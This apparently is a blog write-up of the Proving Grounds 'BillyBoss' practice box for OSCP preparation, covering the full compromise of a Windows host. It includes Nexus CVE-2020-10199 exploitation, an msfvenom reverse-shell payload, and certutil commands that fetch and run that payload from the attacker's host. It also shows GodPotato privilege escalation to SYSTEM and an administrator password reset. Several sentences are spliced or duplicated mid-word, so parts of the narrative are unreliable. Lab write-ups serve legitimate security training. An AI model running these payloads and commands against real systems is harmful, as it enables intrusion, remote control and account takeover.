Post cover image

June 2, 2026

BillyBoss | Proving Grounds | OSCP Preparation

Box: Billyboss Community Rating: Hard

SilentExploit

8 min read

As always, start off with a comprehensive nmap scan of the target:

┌──(root㉿user)-[/run/…/tools/winprivesc/Win-Potato/GodPotato]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-02 16:18 BST
Initiating Parallel DNS resolution of 1 host. at 16:18
Completed Parallel DNS resolution of 1 host. at 16:18, 0.02s elapsed
Initiating SYN Stealth Scan at 16:18
Scanning 192.168.148.61 [65535 ports]
Discovered open port 80/tcp on 192.168.148.61
Discovered open port 21/tcp on 192.168.148.61
Discovered open port 135/tcp on 192.168.148.61
Discovered open port 445/tcp on 192.168.148.61
Discovered open port 139/tcp on 192.168.148.61
Discovered open port 49669/tcp on 192.168.148.61
Discovered open port 49667/tcp on 192.168.148.61
Discovered open port 8081/tcp on 192.168.148.61
Discovered open port 49665/tcp on 192.168.148.61
Discovered open port 49668/tcp on 192.168.148.61
Discovered open port 49666/tcp on 192.168.148.61
Discovered open port 5040/tcp on 192.168.148.61
Discovered open port 49664/tcp on 192.168.148.61
Completed SYN Stealth Scan at 16:18, 15.13s elapsed (65535 total ports)
Nmap scan report for 192.168.148.61
Host is up (0.027s latency).
Not shown: 53882 closed tcp ports (reset), 11640 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
8081/tcp  open  blackice-icecap
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds
           Raw packets sent: 93197 (4.101MB) | Rcvd: 54095 (2.164MB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-02 16:18 BST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:18
Completed Parallel DNS resolution of 1 host. at 16:18, 0.01s elapsed
Initiating SYN Stealth Scan at 16:18
Scanning 192.168.148.61 [1000 ports]
Discovered open port 135/tcp on 192.168.148.61
Discovered open port 445/tcp on 192.168.148.61
Discovered open port 80/tcp on 192.168.148.61
Discovered open port 21/tcp on 192.168.148.61
Discovered open port 139/tcp on 192.168.148.61
Discovered open port 8081/tcp on 192.168.148.61
Completed SYN Stealth Scan at 16:18, 3.60s elapsed (1000 total ports)
Initiating Service scan at 16:18
Scanning 6 services on 192.168.148.61
Completed Service scan at 16:18, 7.74s elapsed (6 services on 1 host)
NSE: Script scanning 192.168.148.61.
Initiating NSE at 16:18
Completed NSE at 16:18, 8.11s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.19s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Nmap scan report for 192.168.148.61
Host is up (0.022s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-favicon: Unknown favicon MD5: 8D9ADDAFA993A4318E476ED8EB0C8061
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: BaGet
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
8081/tcp open  http          Jetty 9.4.18.v20190429
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: Nexus/3.21.0-05 (OSS)
| http-robots.txt: 2 disallowed entries
|_/repository/ /service/
|_http-favicon: Unknown favicon MD5: 9A008BECDE9C5F250EDAD4F00E567721
|_http-title: Nexus Repository Manager
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<SNIP>

We can then go through and begin probing each service; port by port.

I have surmised my preliminary findings below:

Port 21 (FTP): no luck brute forcing.
Port 135 (RPC): attempted rpcclient with anonymous access (failed)
Port 139,445 (SMB); no anonymous access.

Port 80 (website)

This site is hosting BaGet a lightweight NuGet and symbol server. It is open source but I couldn't find any information regarding public exploits. I attempted directory enumeration with dirsearch and ffuf but this didn't lead anywhere so I marked as a potential (but unlikely) entry vector.

None

Port 8081

Sonatype Nexus Repository Manager (OSS 3.21.0–05) is a widely used open-source repository manager that serves as a centralized hub for managing software components, binaries, and build artifacts.

None

We can see that we have a sign in function but no credentials. HuntinDP / Winrm were all closed — I decided to use impacket's wmiexec to spawn a shell directly as the adminig down default credentials led to to note that there doesn't appear to be any default credentials.

None

I did a quick search using creds but this fails to yield the correct login:

┌──(venv)─(root㉿user)-[/tmp/DefaultCreds-cheat-sheet]
└─# creds search "nexus repository"
+--------------------------------+----------+----------+
| Product                        | username | password |
+--------------------------------+----------+----------+
| nexus repository manager (web) |  admin   | admin123 |
+--------------------------------+----------+----------+

At this point, I had used username-anarchy to generate a list of potential username / password combinations based on the Sonatype Nexus Repository Manager and the potential for 'admin' to also be the username.

The correct login ends up being — nexus:nexus

I thought this was a little bit of a sneaky move by Offsec and would hope that the OSCP is more logical with the bruteforcing / password guessing.

None

Initial foothold

Initially, I spent lots of time on this box trying to bypass authentication entirely to utilize the path traversal vulnerability to obtain the login credentials ( listed in the searchsploit output below).

This left me with only potential exploit: CVE-2020–10199. An authenticated RCE vulnerability caused by a failure to properly validate user-submitted data in administrative templates. As we now have credentials to login — we can exploit this flaw by submitting a crafted request to inject and execute arbitrary Java code on the underlying server.

┌──(venv)─(root㉿user)-[/tmp/DefaultCreds-cheat-sheet]
└─# searchsploit 'sonatype nexus'
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)                              | java/webapps/49385.py
Sonatype Nexus Repository 3.53.0-01 - Path Traversal                                       | multiple/webapps/52101.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Grab a copy of the exploit and then begin modification:

┌──(venv)─(root㉿user)-[/tmp/DefaultCreds-cheat-sheet]
└─# searchsploit -m java/webapps/49385.py

Lines 22–25 are the only sections that will require modification in order for the exploit to be successful:

None

It took some trial and error for me as I initially transferred netcat onto the target and executed that for a reverse shell; it would provide a reverse connection but the shell was totally dumb. I then tried to utilise powershell's IEX module to trigger a reverse shell from the target but this also failed.

Finally, I switched to creating an executable with msfvenom (shell.exe)

┌──(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.223 LPORT=4444 -f exe > shell1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes

I then modified the exploit script's CMD variable and ran it twice; firstly to download the malicious shell we created above and then to execute it:

CMD="cmd.exe /c certutil.exe -urlcache -split -f http://192.168.45.223/shell1.exe C:/Windows/Temp/shell1.exe"
CMD="cmd.exe /c C:/Windows/Temp/shell1.exe"
┌──(venv)─(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# python3 49385.py
Logging in
Logged in successfully
Command executed

Privilege Escalation

DP / Winrm were all closed — I decided to use impacket's wmiexec to spawn a shell directly as the adminiWith a shell as Nathan; I immediately checked to see what privileges he holds and was confronted with the coveted SeImpersonatePrivilege . This is a gold mine for privilege escalation as it opens you up to the possibility of a potential Potato Attacks alongside other tools LPE vectors like printspoofer.

C:\Users\nathan\Nexus\nexus-3.21.0-05>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disable

After sometime experimenting; I switched to GodPotato. This has the potential to work on Windows 2012 — Windows 2022 making it much more applicable to the target.

If you click the Repository you will see there are different NET compilations of the binary: you can run the following command to check what NET framework is on your machine:

C:\Users\nathan\desktop>reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s /v Version | findstr /i "version"
    Version    REG_SZ    4.8.03752
    Version    REG_SZ    4.8.03752
    Version    REG_SZ    4.8.03752
    Version    REG_SZ    4.8.03752
    Version    REG_SZ    4.0.0.0

The above output confirmed that we are dealing with NET4 so I went ahead and executed GodPotato-NET4.exevia the following syntax:

C:\Users\nathan\Nexus\nexus-3.21.0-05>./GodPotato-NET4.exe -cmd "cmd /c whoami"
./GodPotato-NET4.exe -cmd "cmd /c whoami"
'.' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\nathan\Nexus\nexus-3.21.0-05>GodPotato-NET4.exe -cmd "cmd /c whoami"
GodPotato-NET4.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140711670317056
[*] DispatchTable: 0x140711672659552
[*] UseProtseqFunction: 0x140711672027584
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\889ea17c-1fa0-4606-bf34-0af137ab7545\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000f002-11d0-ffff-bad1-dcdf654d7aac
[*] DCOM obj OXID: 0x8035bc449f3f33cc
[*] DCOM obj OID: 0x59dcda1b700c9f00
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 840 Token:0x656  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2524

CurrentUser: NT Authority \ System ; we can see that we have successfully executed the command impersonating the administrator. There were a few ways we could proceed here — I decided to simply change the administrator's password via the following syntax:

C:\Users\nathan\Nexus\nexus-3.21.0-05>GodPotato-NET4.exe -cmd "cmd /c net user administrator newpassword123"
GodPotato-NET4.exe -cmd "cmd /c net user administrator newpassword123"
[*] CombaseModule: 0x140711670317056
[*] DispatchTable: 0x140711672659552
[*] UseProtseqFunction: 0x140711672027584
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\04f24fdd-cbd4-4de9-81d1-9bcf637c18c5\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0c7c-ffff-537e-2c9faa0dd8f6
[*] DCOM obj OXID: 0x88d6603b66573e13
[*] DCOM obj OID: 0x907cfef0837c2687
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 840 Token:0x656  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 1704
The command completed successfully.

In real life I don't think the client would be happy with you changing an administrator's password but … this is only a CTF so don't worry. haha.

I confirmed the password change was successful via netexec:

┌──(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.223] from (UNKNOWN) [192.168.148.61] 50136
┌──(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# nxc smb 192.168.148.61 -u administrator -p newpassword123
SMB         192.168.148.61  445    BILLYBOSS        [*] Windows 10 / Server 2019 Build 18362 x64 (name:BILLYBOSS) (domain:billyboss) (signing:False) (SMBv1:False)
SMB         192.168.148.61  445    BILLYBOSS        [+] billyboss\administrator:newpassword123 (Pwn3d!)

As RDP / Winrm were all closed — I decided to use impacket's wmiexec to spawn a shell directly as the administrator (we could've used psexec but I find this is a last resort as the shell is often slow):

┌──(root㉿user)-[/run/…/user/2024/HTBox/billyboss]
└─# impacket-wmiexec billyboss/administrator:newpassword123@192.168.148.61
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
billyboss\administrator